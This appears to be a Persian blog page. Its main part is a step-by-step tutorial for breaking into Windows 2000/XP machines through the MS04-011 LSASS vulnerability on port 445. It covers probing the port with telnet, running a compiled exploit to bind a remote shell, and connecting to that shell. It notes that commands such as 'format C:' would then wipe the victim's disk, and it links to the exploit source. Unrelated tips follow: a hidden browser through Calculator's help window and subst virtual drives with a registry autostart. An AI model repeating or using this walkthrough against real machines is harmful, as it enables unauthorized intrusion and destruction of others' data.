هک بدون برنامه

مطلبي که در اينجا ميخوانيد يکمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميکنم خيلي ساده عنوان کنم اصلا نگران نباشيد
خلاصه کاري که ما ميکنيم اين است که ما با کارهاي زير ميخواهيم به ويندوز 2000 يا ايکس پي حمله کنيم از بيرون دستگاه بدون اينکه به قرباني فايلي بديم اجرا کنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هکر هاي تازه کار که تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يک پورت روي دستگاه قرباني باز کنيم بدون اينکه حتي يک کلمه هم با قرباني حرف بزنيم خوب حالا که فهميديد چيکار ميخوام بکنيم من يکبار ديگه هم خلاصه بگم يک اي پي انتخاب ميکنيد و بعد هکش ميکنيد اولين کاري که ميکنيم اين است که اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميکنيم
Start->run->CMD
را براي باز کردن يک صفحه کامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميکنيم که ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هکر هاي حرفه اي براي اين کارها يک برنامه خاص را استفاده ميکني بنا به سليقه خودتان که از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي استفاده ميکنيم که هر کسي خواست اين کار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با کمترين امکانات ميخوايم به نتيجه برسيم
خوب توجه کنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد کنيد و اگر اين دستور را وارد کرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت کرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير کد هاي حمله به اين پورت را مشاهده ميکنيد اين کدها را بايد کامپايل بفرمائيد و فايل اجرايي که بدست مي اوريد را بصورت زير استفاده ميکنيد

در خط بالا طرز استفاده به اين ترتيب است اولين کلمه expl نام فايل اجرايي است که بعد از کامپايل ايجاد کرديد target يک عدد يک رقمي است که مقدار 0 براي ويندوز ايکس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينکه کدام عدد را استفاده کنيد يعني از کجا بفهميد قرباني ويندوز ايکس پي است که 0 بزنيد يا قرباني ويندوز 2000 است که 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است که پورت 445 ان باز بود
binport شماره پورتي است که ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هک کنيد
option يک دستور است که در ادامه تک دستور اين برنامه را توضيح ميدهم

خوب دوست من کار بسيار ساده است فرض کنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي که بالا گفتم اين کارهاي را به تريتب انجام ميدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله که قبلا کامپال کردم و الان اماده استفاده است استفاده ميکنم
4- پنجره قبلي را که در 2 دستور قبل باز کردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينکه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميکنيد----
* [*] Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
* [*] Connecting to 217.0.0.1:445 ... OK
* [*] Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما که در خط شماره 6 من شماره پورت 24745 را انتخاب کردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هک کنيد و اين خطوط را مشاهده خواهيد کرد
* Microsoft windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت کنيد
ولي توجه کنيد يک هکر در اوج قدرت دست به خرابکاري نميزنه !!! پس هر کاري خواستيد بکنيد ولي خرابکاري نه !!!

و اما چطوري تشخيص بدهيد که دستگاه قرباني شما ويندوز 2000 است که از عدد 1 يا 2 استفاده کنيد يا ويندوز ايکس پي هست که از عدد0 استفاده کنيد ؟ شما کافي است که همان دستور بالا را که براي حمله استفاده مکنيد بزنيد و فقط به اخرش -t اضافه کنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميکند اگر نسخه ويندوز را winnt 5.0اعلام کرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده کنيد و اگر winnt 5.1 را اعلام کرد ويندوز ايکس پي است

اميدوارم که مطلب بالا مورد استفاده شما قرار گرفته باشد توجه کنيد براي اينکه همه بتوانند اين مطلب را استفاده کنند مجبور شدم که خيلي جاها را ساده کنم ولي در سورس اصلي برنامه ميتوانيد به اصل دستور عمل ها پي ببريد .

براي دريافت کد برنامه به زبان سي اينجا کليک کنيد

ادرس : http://downloads.securityfocus.com/vulnerabilities/exploits/HOD-ms04011-lsasrv-expl.c

نظر بدي ما چاکريم

       جون من نظر بدين مطالب توپي دارم براتون ميزارم

براي اين کار
ابتدا به اينترنت وصل شويد.
برنامه Calculator را از طريق Start > All Programs > Accesroies اجرا کنيد.
از منوي Help برنامه روي Help Topics کليک کنيد. خواهيد ديد پنجره جديدي و مربوط به Help برنامه باز ميشود.
اکنون از بالاي پنجره ، سمت چپ ، محلي که عبارت Calclulator به چشم ميخورد ، بر روي آيکون علامت سوال زرد کليک کنيد.
در داخل منو بر روي Jump to URL کليک کنيد. خواهيد ديد که پنجره کوچکي باز ميشود.
اکنون کافي است در فيلد مخصوص Jump to this URL ، آدرس سايتي که ميخواهيد به آن وارد شويد مثلأ http://www.tarfandestan.com را وارد کنيد و روي دکمه OK کليک کنيد.
حالا چند ثانيه صبر کنيد تا پنجره سمت راست ، صفحه اينترنتي شما لود شود.
به اين ترتيب شما يک مروگر مخفي در اختيار خواهيد داشت.
لازم به ذکر است براي وارد کردن آدرس اينترنتي ، وارد نمودن //:http الزامي است.

نظر ندادن نرو ممنون

قبل از شروع عمليات لازم است ذکر کنم ايجاد چنين درايوهايي هيچ ربطي به پارتيشن بندي هارد ديسک ندارد و سلامت سيستم عامل شما را به خطر نخواهد انداخت. بنابراين نگران از دست رفتن اطلاعات خود نباشيد. ضمنا اگر خوشتان نيامد راهي براي از بين بردن درايو مجازي وجود دارد. تا انتهاي اين مقاله با ما باشيد.

براي ساخت درايو مجازي در اين آموزش از فايل هاي خود ويندوز کمک مي گيريم. اينبار به سراغ فايل اجرايي Subst.exe مي رويم. اين فايل در پوشه system32 که در پوشه windows قرار گرفته موجود است اين فايل به همراه سيستم عامل داس ارائه شده و اجراي آن در حالت اوليه کار هيچ عکس العملي

نشان نخواهد داد. کلمه Subst برگرفته از کلمه Substitution به معناي جايگزيني و علي البدلي است و در حقيقت براي جانشين کرد يک دايرکتوري به يک درايو بکار مي رود.

به اين معني که با اجراي اين دستور مي توانيد محتويات يک فولدر خاص را به يک درايو تبديل کنيد و آن را در My Computer نشان دهيد. گاهي اوقات گشتن به دنبال پوشه ايي در ميان انبوه فايل ها و فولدرهاي در يک درايو خاص وقت گير است. اين کار مي تواند اين امر را تسهيل بخشد.

مسلما عملياتي مانند کپي و کات فايل ها يا حتي نصب برنامه ها در درايو هايي که به اين روش ايجاد می شوند مقدور خواهد بود اما در مورد عملیات سیستمی مانند فرمت یا اسکن دیسک امکان پذیر نیست. حال چگونه از این Subst استفاده کنیم؟

به Run یا Command Prompt ویندوز وارد شوید ( توضیح: Run در خود منوی استارت ویندوز موجود است و همچنین برای ورود به Command Prompt در فیلد Run کلمه cmd را تایپ و اینتر کنید ) حال باید دستوری مطابق شکل زیر تایپ کنید (شکل کلی فرمان):

فکر نکنم نیاز به توضیح چندانی باشه NewDriveName نام درایو جدیدی که قصد دارید ایجاد کنید. دقت کنید که این نام مشابه نام درایوهای موجود نباشه و Folder Direction مسیر پوشه ایی که قصد دارید اون رو به صورت درایو مجازی در بیارید. برای نمونه، مثال های زیر درایوهایی با نام K و L ایجاد خواهند کرد. درایو K جایگزینی برای محتویات پوشه C:part و درایو L جایگزینی برای مسیر C: Program FilesAdobe .

Subst K: C:part
Subst L: C: Program FilesAdobe

توجه! مدت دوام این درایو های مجازی بعد از ریستارت سیستم پایان می پذیرد و با یک بار ریستارت سیستم، دیگر این درایوها را نخواهید دید. برای جلوگیری از این امر چندین راه وجود دارد که بعلت کمی فرصت تنها یکی را شرح می دهیم.
در سیستم عامل های Dos و Win9x ساده ترین راه ویرایش فایل Autoexec.bat خواهد بود. این فایل را در درایو C بیابید و خطوط مربوط به Subst را در آن تایپ کنید تا در هر بار ریستارت سیستم به تبع آن Subst ایجاد شود. در سیستم عامل های xp و 2000 بهترین و راحترین کار این است که یک فایل اجرایی با پسوند .bat یا همان BatchFile ایجاد کنیم و خود فایل یا Shortcut آنرا در استارتاپ سیستم قرار دهیم.

یا می توانیم مسیر را در رجیستری ایجاد کنیم.

حال چگونه فایل اجرایی یا همان BatchFile را ایجاد کنیم. مسیر زیر را برای باز کردن یک صفحه notepad طی کنید:

از منوی فایل Save as را انتخاب و در مسیری دلخواه فایل را با پسوند bat ذخیره کنید. حال به سراغ فایلی که ایجاد کرده اید بروید. بر روی آن راست کلیک و Edit را برگزینید و دستورات مربوط به Subst را در آن تایپ و فایل را ذخیره کنید. حال نوبت به مسیردهی این فایل در رجیستری می رسد. به رجیستری وارد شوید( در فیلد Run کلمه Regedit را تایپ کنید). مسیر زیر را طی کنید:

HKEY_CURRENT_USERSOFTWARE
MicrosoftwindowsCurrent VersionRun

حال در بخش سمت راست محیط رجیستری راست کلیک کرده و پس از انتخاب گزینه New گزینه String Value را انتخاب سپس یک نام به ارزش ایجاد شده داده و با دابل کلیک بر روی آن در قسمت Value Date آدرس BatchFile را که در مرحله قبل ایجاد کرده اید، وارد کنید. بر روی ok کلیک و از رجیستری خارج شوید. اگر مراحل را درست طی کرده باشید این بار با ریستارت ویندوز درایوهای مجازی دوباره ایجاد خواهند شد.

حال اگر پشیمان شدید و قصد حذف درایو مجازی را داشتید طبق زیر عمل کنید:
پس از پاک کردن دستورات اضافه شده در فایل Autoexec.bat در سیستم عامل های Dos و Win9x و یا پاک کردن Shortcut یا خود فایل bat از استارتاپ سیستم و یا پاک کردن ارزش رشته در رجیستری برای سیتم عامل های xp و 2000 سیستم را یک بار دیگر ریستارت کنید. اگر هم بخواهید این کار را بدون ریستارت انجام دهید کافیست در Run یا Command Prompt دستور زیر را تایپ کنید:

که NewDriveName نام درایوی که قصد پاک کردن آن را دارید می باشد. امیدوارم از این آموزش کمال استفاده را برده باشید.